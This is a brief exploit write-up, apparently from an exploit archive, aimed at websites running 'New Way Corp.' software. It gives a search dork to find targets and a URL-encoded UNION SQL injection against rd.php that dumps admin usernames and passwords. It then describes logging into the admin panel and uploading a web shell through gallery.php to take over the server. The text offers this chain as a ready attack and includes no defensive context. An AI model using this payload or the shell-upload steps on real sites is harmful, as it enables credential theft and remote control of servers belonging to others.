# Dork: intext:"Powered by New Way Corp."
1) First, SQL Injection
1 2http://[site]/rd.php?url=LOL%27%20UNION%20SELECT%201,2,3,%28SELECT%20concat%28username,%200x3a,%20password%29%20FROM%20admin%29,5,6,7,8--%20-
2) Then go to admin panel and log http://[site]/admin/
GO to http://[site]/admin/gallery.php Upload your shell Visit it at http://[site]/gallery/shell.php
Groucho